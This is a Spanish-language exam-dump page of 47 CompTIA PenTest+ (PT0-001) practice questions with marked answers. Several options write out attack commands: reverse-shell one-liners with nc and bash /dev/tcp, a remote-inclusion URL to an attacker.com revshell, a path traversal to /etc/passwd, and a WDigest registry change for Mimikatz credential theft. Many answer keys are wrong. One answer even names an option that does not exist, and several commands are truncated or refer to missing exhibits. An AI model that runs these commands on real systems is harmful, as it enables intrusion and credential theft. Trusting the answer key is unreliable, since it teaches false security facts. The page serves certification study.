¿NO QUIERES PERDERTE NADA?

Consejos para aprobar el examen de certificación

Últimas noticias sobre exámenes e información sobre descuentos.

Curado y actualizado por nuestros expertos.

Sí, envíame el boletín.

CompTIA PT0-001 Preguntas de Examen 2024 Actualizadas: Prepárese para los exámenes, Certificación CompTIA PenTest+ | SPOTO

Prepárese para su certificación CompTIA PenTest+ (PT0-001) con nuestras 2024 preguntas de examen actualizadas de CompTIA PT0-001. La mejor manera de prepararse para sus exámenes es practicando con las últimas preguntas de examen. Nuestras pruebas de práctica cubren una gama de temas y escenarios, incluyendo pruebas prácticas en nuevos entornos como la nube y plataformas móviles, además de escritorios y servidores tradicionales. Al utilizar nuestras preguntas de examen, preguntas de muestra y volcados de examen, obtendrá los conocimientos y la confianza necesarios para tener éxito. Nuestros exámenes de prueba y el simulador de examen proporcionan una experiencia de examen realista para mejorar aún más su preparación. Acceda a nuestros materiales y respuestas de examen para asegurarse de estar completamente preparado para el examen PT0-001 y obtener su certificación CompTIA PenTest+ con facilidad.
Realizar otros exámenes en línea

Cuestionar #1
Un probador de penetración entrega un informe de escaneo de vulnerabilidad de una aplicación web a un cliente. El evaluador de intrusión califica una vulnerabilidad como de gravedad media. La misma vulnerabilidad se calificó como crítica en el informe anterior. ¿Cuál de las siguientes es la razón MÁS probable para la reducción de la gravedad?
A. El cliente ha aplicado un hot fix sin actualizar la versión
B. El panorama de las amenazas ha cambiado significativamente
C. El cliente ha actualizado su código base con nuevas funciones
D. Thera actualmente no hay exploits conocidos para esta vulnerabilidad
Ver respuesta
Respuesta correcta: A
Cuestionar #2
Un probador de penetración está realizando una recopilación de inteligencia inicial en algunos hosts remotos antes de realizar un escaneo de vulnerabilidades. El probador ejecuta el siguiente comando: nmap -p 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130 ¿Cuál de las siguientes opciones describe MEJOR por qué se especifican múltiples direcciones IP?
A. La red está subredizada como a/25 o superior, y el probador necesitaba acceder a hosts en dos subredes diferentes
B. El probador intenta realizar un escaneo más sigiloso incluyendo varias direcciones falsas
C. La máquina de escaneado dispone de varias interfaces para equilibrar la solicitud de escaneado a través de la velocidad especificadA
D. Se ejecuta un escaneo de descubrimiento en el primer conjunto de direcciones, mientras que se ejecuta un escaneo más profundo y agresivo contra el último host
Ver respuesta
Respuesta correcta: A
Cuestionar #3
Un probador de penetración identifica los siguientes hallazgos durante una exploración de vulnerabilidad externa: ¿Cuál de las siguientes estrategias de ataque debería priorizarse a partir de los resultados del análisis anterior?
A. El software obsoleto puede contener componentes explotables
B. Pueden emplearse prácticas deficientes de gestión de contraseñas
C. Los protocolos criptográficamente débiles pueden ser interceptados
D. Las configuraciones del servidor web pueden revelar información sensible
Ver respuesta
Respuesta correcta: D
Cuestionar #4
Una empresa contrata a un probador de penetración para determinar si hay alguna vulnerabilidad en su nueva instalación de concentrador VPN con una IP externa de 100.170.60.5. Cuál de los siguientes comandos probará si la VPN está disponible?
A. fpipe
B. ike-scan -A -t 1 --sourceip=apoof_ip 100
C. nmap -sS -A -f 100
D. nc 100
Ver respuesta
Respuesta correcta: B
Cuestionar #5
Un evaluador de penetración informa que una aplicación sólo utiliza autenticación básica en una aplicación orientada a Internet. ¿Cuál de las siguientes sería la MEJOR estrategia de corrección?
A. Active la seguridad estricta de transporte HTTP
B. Habilitar una bandera de cookie segurA
C. Cifrar el canal de comunicación
D. Sanitize la entrada invalida del usuario
Ver respuesta
Respuesta correcta: A
Cuestionar #6
Un correo electrónico enviado por el Consejero Delegado (CEO) al Director Financiero (CFO) indica que se necesita una transferencia bancaria para pagar a un nuevo proveedor. Ninguno de los dos conoce al proveedor y el director general niega haber enviado el correo electrónico. ¿Cuál de los siguientes tipos de motivación se utilizó en este ataque?
A. Principio del miedo
B. Principio de autoridad
C. Principio de escasez
D. Principio de semejanza
E. Principio de prueba social
Ver respuesta
Respuesta correcta: B
Cuestionar #7
Un evaluador de seguridad completó una prueba de penetración exhaustiva de una empresa y sus redes y sistemas. Durante la evaluación, el evaluador identificó una vulnerabilidad en la biblioteca criptográfica utilizada para TLS en la aplicación web de nóminas de la intranet de la empresa. Sin embargo, la vulnerabilidad aún no ha sido parcheada por el proveedor, aunque se espera un parche en los próximos días. ¿Cuál de las siguientes estrategias mitigaría MEJOR el riesgo de impacto?
A. Modifique la configuración de cifrado del servidor web para utilizar un paquete de cifrado más potente para el cifrado, el hash y la firma digital
B. Implantar una nueva formación para ser conscientes de los riesgos de acceder a la aplicación
C. Implementar una ACL para restringir el acceso a la aplicación exclusivamente al departamento financiero
D. Requerir a los usuarios de nóminas que cambien las contraseñas utilizadas para autenticarse en la aplicación
Ver respuesta
Respuesta correcta: C
Cuestionar #8
Se ha asignado a un evaluador de penetración la realización de una evaluación de penetración externa de una empresa. ¿Cuál de los siguientes pasos sería el MEJOR para el proceso de recopilación de información pasiva? (Elija dos.)
A. Esperar fuera del edificio de la empresa e intentar ir detrás de un empleado
B. Realizar un escaneo de vulnerabilidades contra el bloque de red externo de la empresa, identificar vulnerabilidades explotables e intentar obtener acceso
C. Utilizar los sitios web de registro de dominios e IP para identificar los bloques de red externos de la empresa y las aplicaciones de cara al exterior
D. Buscar en las redes sociales a empleados de tecnologías de la información que publiquen información sobre las tecnologías con las que trabajan
E. Identificar la aplicación de correo web externa de la empresa, enumerar las cuentas de usuario e intentar adivinar la contraseña para obtener acceso
Ver respuesta
Respuesta correcta: DE
Cuestionar #9
Dado el siguiente guión: ¿Cuál de las siguientes opciones describe MEJOR el propósito de esta secuencia de comandos?
A. Recogida de registros
B. Recogida de eventos
C. Supervisión de pulsaciones de teclas
D. Recopilación de mensajes de depuración
Ver respuesta
Respuesta correcta: C
Cuestionar #10
Al intentar mantener la persistencia en un sistema Windows con privilegios limitados, ¿cuál de las siguientes claves de registro debe utilizar el probador?
A. HKEY_CLASSES_ROOT
B. HKEY_LOCAL_MACHINE
C. HKEY_ACTUAL_USER
D. HKEY_CURRENT_CONFIG
Ver respuesta
Respuesta correcta: C
Cuestionar #11
Un desarrollador de software quiere probar el código de una aplicación en busca de vulnerabilidades. ¿Cuál de los siguientes procesos debe realizar el desarrollador de software?
A. Exploración de vulnerabilidades
B. Exploración dinámica
C. Exploración estática
D. Escaneo de conformidad
Ver respuesta
Respuesta correcta: A
Cuestionar #12
Durante una evaluación de una aplicación web, un evaluador de penetración descubre que se pueden ejecutar comandos arbitrarios en el servidor. Queriendo llevar este ataque un paso más allá, el probador de penetración comienza a explorar formas de obtener un shell inverso de vuelta a la máquina atacante en 192.168.1.5. ¿Cuáles de las siguientes son posibles formas de hacerlo? (Seleccione DOS).
A. nc 192
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
D. nc -e /bin/sh 192
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
Ver respuesta
Respuesta correcta: BC
Cuestionar #13
Dado lo siguiente: http://example.com/download.php?id-.../.../.../etc/passwd ¿Cuál de las siguientes opciones describe MEJOR el ataque anterior?
A. Ataque de carga de archivos maliciosos
B. Ataque de redirección
C. Ataque a través de directorios
D. Ataque inseguro de referencia directa al objeto
Ver respuesta
Respuesta correcta: C
Cuestionar #14
Una empresa contrató a una empresa especializada en pruebas de penetración para evaluar la seguridad de una aplicación empresarial básica. La empresa le proporcionó una copia del código de bytes de Java. ¿Cuál de los siguientes pasos debe seguir la empresa antes de poder ejecutar un analizador de código estático?
A. Ejecute la aplicación a través de un analizador de código dinámico
B. Emplear una utilidad de fuzzing
C. Descompilar la aplicación
D. Compruebe las asignaciones de memoriA
Ver respuesta
Respuesta correcta: D
Cuestionar #15
Mientras monitoriza los registros WAF, un analista de seguridad descubre un ataque exitoso contra la siguiente URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php ¿Cuál de los siguientes pasos de remediación debería tomarse para prevenir este tipo de ataque?
A. Implementar una lista negrA
B. Bloquear las redirecciones de URL
C. Codificar los parámetros con doble URL
D. Detener las llamadas externas desde la aplicación
Ver respuesta
Respuesta correcta: B
Cuestionar #16
Una empresa solicitó a un probador de penetración que revisara la seguridad de una aplicación Android desarrollada internamente. El probador de penetración recibió un archivo APK para apoyar la evaluación. El evaluador quiere ejecutar SAST en el archivo APK. ¿Cuál de los siguientes pasos preparatorios debe realizar PRIMERO el evaluador de penetración? (Seleccione DOS).
A. Convertir a JAR
B. Descompilar
C. Compilación cruzada de la aplicación
D. Convertir archivos JAR a DEX
E. Vuelva a firmar el APK
F. Adjuntar al ADB
Ver respuesta
Respuesta correcta: AB
Cuestionar #17
Una prueba de penetración recientemente concluida reveló que una aplicación web heredada es vulnerable a la inyección SQL. La investigación indica que remediar completamente la vulnerabilidad requeriría un cambio arquitectónico, y las partes interesadas no están en posición de arriesgar la disponibilidad de la aplicación. En estas circunstancias, ¿cuáles de los siguientes controles son soluciones de bajo esfuerzo y a corto plazo para minimizar el riesgo de inyección SQL? (Elija dos.)
A. Identificar y eliminar las sentencias SQL en línea del código
B. Identificar y eliminar el SQL dinámico de los procedimientos almacenados
C. Identificar y desinfectar todas las entradas de usuario
D. Utilizar un enfoque de lista blanca para las sentencias SQL
E. Utilizar un enfoque de lista negra para las sentencias SQL
F. Identificar el origen de la entrada maliciosa y bloquear la dirección IP
Ver respuesta
Respuesta correcta: CD
Cuestionar #18
Durante las pruebas, se descubre una vulnerabilidad crítica en el servidor central de un cliente. ¿Cuál de las siguientes debería ser la PRÓXIMA acción?
A. Desactivar el puerto de red del servicio afectado
B. Completar todas las conclusiones y presentarlas al cliente
C. Avisar inmediatamente al cliente con los detalles del hallazgo
D. Desconectar el objetivo para que no pueda ser explotado por un atacante
Ver respuesta
Respuesta correcta: A
Cuestionar #19
¿Cuál de los siguientes comandos permitiría a un probador de penetración acceder a una red privada desde Internet en Metasploit?
A. set rhost 192
B. ejecutar autoroute -s 192
C. db_nmap -iL /tmp/privatehosts
D. utilizar auxiliary/server/socks4a
Ver respuesta
Respuesta correcta: A
Cuestionar #20
Una empresa planificó y consiguió el presupuesto para contratar a un consultor que realizara una prueba de penetración en una aplicación web. Tras descubrir las vulnerabilidades, la empresa pidió al consultor que realizara las siguientes tareas: Revisión del código Actualizaciones de la configuración del cortafuegos ¿Cuál de las siguientes situaciones se ha producido en esta situación?
A. Desviación del ámbito de aplicación
B. Revisión post mortem
C. Aceptación del riesgo
D. Prevención de amenazas
Ver respuesta
Respuesta correcta: A
Cuestionar #21
Un cliente está pidiendo a un probador de penetración que evalúe la disponibilidad de una nueva aplicación web. Cuál de los siguientes tipos de ataques debería utilizar el evaluador?
A. Inundación TCP SYN
B. Inyección SQL
C. XSS
D. Escaneo XMAS
Ver respuesta
Respuesta correcta: B
Cuestionar #22
El siguiente comando se ejecuta en un sistema de archivos Linux: chmod 4111 /usr/bin/sudo ¿Cuál de los siguientes problemas puede ser explotado ahora?
A. Vulnerabilidades del núcleo
B. Bits pegajosos
C. Vía de servicio no cotizada
D. Sudo mal configurado
Ver respuesta
Respuesta correcta: B
Cuestionar #23
Un probador de penetración es capaz de moverse lateralmente a través de un dominio con obstáculos mínimos después de comprometer una sola estación de trabajo. ¿Cuál de las siguientes estrategias de mitigación sería la MEJOR para recomendar en el informe? (Seleccione TRES).
A. Aleatorice las credenciales de administrador local para cada máquinA
B. Desactivar los inicios de sesión remotos para los administradores locales
C. Exigir autenticación multifactor para todos los inicios de sesión
D. Aumentar los requisitos mínimos de complejidad de las contraseñas
E. Aplicar un control de acceso a la red adicional
F. Activar el cifrado de disco completo en cada estación de trabajo
G. Segmentar cada host en su propia VLAN
Ver respuesta
Respuesta correcta: CDE
Cuestionar #24
¿Cuál de las siguientes opciones explica MEJOR por qué es importante mantener la confidencialidad de cualquier hallazgo identificado al realizar una prueba de penetración?
A. Los hallazgos de las pruebas de penetración suelen contener propiedad intelectual de la empresa
B. Los resultados de las pruebas de penetración podrían provocar la insatisfacción de los consumidores si se hicieran públicos
C. Los resultados de las pruebas de penetración son documentos legales que contienen información privilegiadA
D. Los resultados de las pruebas de penetracion pueden ayudar a un atacante a comprometer un sistemA
Ver respuesta
Respuesta correcta: D
Cuestionar #25
Un probador de penetración debe realizar OSINT en el personal de una empresa objetivo después de completar el aspecto de infraestructura. ¿Cuál de los siguientes sería el MEJOR paso para la penetración?
A. Obtener información sobre el personal llamando a la empresa y utilizando técnicas de ingeniería social
B. Visitar al cliente y utilizar la suplantación de identidad para obtener información del personal
C. Enviar correos electrónicos falsos al personal para ver si responden con información sensible
D. Buscar en Internet información sobre el personal, por ejemplo en las redes sociales
Ver respuesta
Respuesta correcta: D
Cuestionar #26
Haga clic en el botón de muestra. Dada la vulnerabilidad Nikto, el resultado del análisis que se muestra en la ilustración, ¿cuál de las siguientes técnicas de explotación podría utilizarse para explotar el sistema de destino? (Elija dos.)
A. Ejecución arbitraria de código
B. Secuestro de sesión
C. Inyección SQL
D. Forzamiento bruto de credenciales de inicio de sesión
E. Falsificación de petición en sitios cruzados
Ver respuesta
Respuesta correcta: BD
Cuestionar #27
Un probador pretende ejecutar el siguiente comando en un sistema de destino: bash -i >& /dev/tcp/10.2.4.6/443 0> &1 ¿Cuál de los siguientes comandos adicionales tendría que ejecutarse en el sistema Linux del probador para que el comando anterior tuviera éxito?
A. nc -nlvp 443
B. nc 10
C. nc -w3 10
D. nc -e /bin/sh 10
Ver respuesta
Respuesta correcta: D
Cuestionar #28
¿Cuál de los siguientes comandos inicia la base de datos de Metasploit?
A. msfconsole
B. espacio de trabajo
C. msfvenom
D. db_init
E. db_connect
Ver respuesta
Respuesta correcta: A
Cuestionar #29
Un consultor de seguridad está intentando atacar un dispositivo con una cuenta de usuario previamente identificada. Cuál de los siguientes tipos de ataque se está ejecutando?
A. Ataque de volcado de credenciales
B. Ataque de inyección DLL
C. Ataque shell inverso
D. Pasar el ataque hash
Ver respuesta
Respuesta correcta: D
Cuestionar #30
Un equipo de desarrollo de software ha migrado recientemente a un nuevo software de aplicación en el entorno local. Los resultados de las pruebas de penetración muestran que existen múltiples vulnerabilidades. Si un probador de penetración no tiene acceso a un entorno en vivo o de prueba, una prueba podría ser mejor crear el mismo entorno en la VM. ¿Cuál de las siguientes opciones es la MÁS importante para la confirmación?
A. Configuración insegura de servicios y protocolos
B. Ejecutar el servicio SMB y SMTP
C. Escasa complejidad de las contraseñas y cuentas de usuario
D. Mala configuración
Ver respuesta
Respuesta correcta: A
Cuestionar #31
La estrategia de pruebas de penetración de caja negra proporciona al probador:
A. una lista de objetivos
B. un diagrama de red
C. código fuente
D. credenciales privilegiadas
Ver respuesta
Respuesta correcta: D
Cuestionar #32
Un probador de penetración está escaneando una red para SSH y tiene una lista de objetivos proporcionados. Cuál de los siguientes comandos de Nmap debería utilizar?
A. nmap -p 22 -iL objetivos
B. nmap -p 22 -sL objetivos
C. nmap -p 22 -oG objetivos
D. nmap -p 22 -oA objetivos
Ver respuesta
Respuesta correcta: A
Cuestionar #33
Si un consultor de seguridad se encuentra con un hash de contraseña parecido al siguiente: b117525b345470c29ca3d8ac0b556ba8 ¿Cuál de los siguientes formatos es el tipo de hash correcto?
A. Kerberos
B. NetNTLMv1
C. NTLM
D. SHA-1
Ver respuesta
Respuesta correcta: D
Cuestionar #34
Un ingeniero, que está llevando a cabo una prueba de penetración para una aplicación web, descubre que el proceso de inicio de sesión de usuario envía de datos de campo utilizando el método HTTP GET. Para mitigar el riesgo de exponer información sensible, el formulario debe enviarse utilizando un método:
A. Método HTTP POST
B. Método HTTP OPTIONS
C. Método HTTP PUT
D. Método HTTP TRACE
Ver respuesta
Respuesta correcta: A
Cuestionar #35
Tras realizar una evaluación de seguridad para una empresa, se descubrió que se había facturado al cliente por el tiempo en que el entorno de pruebas del cliente no estuvo disponible. El cliente afirma que se le ha facturado injustamente. ¿Cuál de los siguientes documentos es MÁS probable que pueda servir de orientación en esta situación?
A. SOW
B. NDA
C. EULAD
Ver respuesta
Respuesta correcta: D
Cuestionar #36
¿Cuáles de los siguientes puntos son los MÁS importantes a la hora de planificar un compromiso? (Seleccione DOS).
A. Metas/objetivos
B. Diagramas arquitectónicos
C. Tolerancia al impacto
D. Tiempo de almacenamiento de un informe
E. Política de empresa
Ver respuesta
Respuesta correcta: AC
Cuestionar #37
¿Cuál de los siguientes registros de la CPU debe sobrescribir el investigador para explotar un desbordamiento de búfer simple?
A. Registro de puntero de pila
B. Registro de puntero de índice
C. Puntero base de pila
D. Registro de índice de destino
Ver respuesta
Respuesta correcta: A
Cuestionar #38
Un probador de penetración ejecuta lo siguiente desde un sistema comprometido 'python -c ' import pty;pty.spawn ("/bin/bash") '. ¿Cuál de las siguientes acciones está realizando el probador?
A. Eliminación del historial Bash
B. Actualización del shell
C. Creación de un sandbox
D. Captura de credenciales
Ver respuesta
Respuesta correcta: B
Cuestionar #39
Un probador de penetración tiene un shell completo a un controlador de dominio y quiere descubrir cualquier cuenta de usuario que no se ha autenticado en el dominio en 21 días. ¿Cuál de los siguientes comandos es el MEJOR para lograrlo?
A. dsrm -users "DN=empresA
B. dsuser -nombre -cuenta -limite 3
C. dsquery usuario -inactivo 3
D. dsquery -o -rdn -limit 21
Ver respuesta
Respuesta correcta: D
Cuestionar #40
Un probador de penetración está intentando capturar un apretón de manos entre un cliente y un punto de acceso monitorizando una red inalámbrica segura WPA2-PSK. El probador está monitoreando el canal correcto para la red identificada, pero no ha tenido éxito en la captura de un apretón de manos. Dado el escenario, ¿cuál de los siguientes ataques ayudaría MEJOR al probador a obtener este apretón de manos?
A. Ataque Karma
B. Ataque de desautenticación
C. Ataque de fragmentación
D. Inundación de emisión SSDI
Ver respuesta
Respuesta correcta: B
Cuestionar #41
Un probador de penetración ejecutó el siguiente escaneo Nmap en un ordenador: nmap -aV 192.168.1.5 La organización dijo que había deshabilitado Telnet de su entorno. Sin embargo, los resultados del escaneo Nmap muestran el puerto 22 cerrado y el puerto 23 abierto a SSH. ¿Cuál de las siguientes es la MEJOR explicación para lo sucedido?
A. La organización no desactivó Telnet
B. Los resultados de Nmap contienen un falso positivo para el puerto 23
C. El puerto 22 fue filtrado
D. El servicio esta corriendo en un puerto no estandar
Ver respuesta
Respuesta correcta: A
Cuestionar #42
¿Cuál de los siguientes es un ejemplo de ataque de spear phishing?
A. Atacar a un ejecutivo con un SMS
B. Dirigirse a un equipo específico con un ataque por correo electrónico
C. Atacar a usuarios aleatorios con una llave USB
D. Apuntar a una organización con un ataque de abrevadero
Ver respuesta
Respuesta correcta: A
Cuestionar #43
Un probador de penetración quiere comprobar manualmente si existe una vulnerabilidad "fantasma" en un sistema. Cuál de los siguientes métodos es el correcto para validar la vulnerabilidad?
A. Descargue el archivo GHOST en un sistema Linux y compile gcc -o GHOST test i:
B. Descargue el archivo GHOST en un sistema Windows y compile gcc -o GHOST GHOST
C. Descargue el archivo GHOST a un sistema Linux y compile gcc -o GHOST
D. Descargue el archivo GHOST a un sistema Windows y compile gcc -o GHOST test i:
Ver respuesta
Respuesta correcta: C
Cuestionar #44
Un probador de penetración está realizando una evaluación de caja negra en una aplicación bancaria basada en web. Al probador sólo se le proporcionó una URL a la página de inicio de sesión. Dados el código y la salida siguientes: ¿Cuál de las siguientes acciones pretende realizar el evaluador?
A. Escalar privilegios horizontalmente
B. Raspar la página en busca de campos ocultos
C. Analizar el código de respuesta HTTP
D. Buscar cabeceras HTTP
Ver respuesta
Respuesta correcta: D
Cuestionar #45
¿Cuál de las siguientes opciones sería la MEJOR para realizar un reconocimiento pasivo del dominio externo de un objetivo?
A. Melocotón
B. CeWL
C. OpenVAS
D. Shodan
Ver respuesta
Respuesta correcta: D
Cuestionar #46
Durante una prueba de penetración, un evaluador ejecuta una campaña de phishing y recibe un shell desde un PC interno con sistema operativo Windows 10. El probador desea realizar la recolección de credenciales con Mimikatz. ¿Cuál de los siguientes cambios en el registro permitiría el almacenamiento en caché de credenciales en la memoria?
A. reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 0
B. reg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
C. reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
Ver respuesta
Respuesta correcta: A
Cuestionar #47
Al comienzo de una prueba de penetración, el probador encuentra un archivo que incluye datos de los empleados, como direcciones de correo electrónico, números de teléfono del trabajo, nombres de los ordenadores y ubicaciones de las oficinas. El archivo está alojado en un servidor web público. ¿Cuál de las siguientes opciones describe MEJOR la técnica utilizada para obtener esta información?
A. Enumeración de los servicios
B. Recopilación OSINT
C. Exploración de puertos
D. Ingeniería social
Ver respuesta
Respuesta correcta: B

Ver respuestas después del envío

Envíe su correo electrónico y WhatsApp para obtener las respuestas a sus preguntas.

Nota: asegúrese de que su ID de correo electrónico y Whatsapp sean válidos para que pueda obtener los resultados correctos del examen.

Correo electrónico:
WhatsApp/número de teléfono: